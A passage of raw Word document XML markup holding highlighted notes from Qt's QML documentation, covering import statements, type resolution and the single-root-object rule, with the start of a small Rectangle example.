        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any type reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> present in a QML document - such as</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- including those made within a</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId356" w:history="1">
        <w:r w:rsidRPr="00B31BD5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript block</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId357" w:history="1">
        <w:r w:rsidRPr="00B31BD5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property bindings</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, are</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>resolved</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>based exclusively on the import statements</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>At least one</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>statement must be present</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import QtQuick 2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Please see the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId358" w:history="1">
        <w:r w:rsidRPr="00B31BD5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Syntax - Import Statements</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>documentation for in-depth information about QML imports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00690F6E" w:rsidRDefault="00B31BD5" w:rsidP="007022E0">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="449" w:name="the-root-object-declaration"/>
      <w:bookmarkStart w:id="450" w:name="_Toc483000627"/>
      <w:bookmarkStart w:id="451" w:name="_Toc483003644"/>
      <w:bookmarkStart w:id="452" w:name="_Toc483603980"/>
      <w:bookmarkStart w:id="453" w:name="_Toc483605200"/>
      <w:bookmarkEnd w:id="449"/>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Root Object Declaration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="450"/>
      <w:bookmarkEnd w:id="451"/>
      <w:bookmarkEnd w:id="452"/>
      <w:bookmarkEnd w:id="453"/>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A QML document describes a </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hierarchy of objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which can be instantiated. Each </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a certain structure; it has a </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, it can have an </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and an object name, it can have </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, it can have </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, it can have </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signals</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it can have </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A QML file must </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only contain</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a single root object definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The following is invalid and will generate an error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD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31BD5">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// MyQmlFile.qml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD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31BD5">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD5">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B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD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31BD5">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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width</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w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>200</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height</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w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>200</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color</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w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD5">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="pln"/>
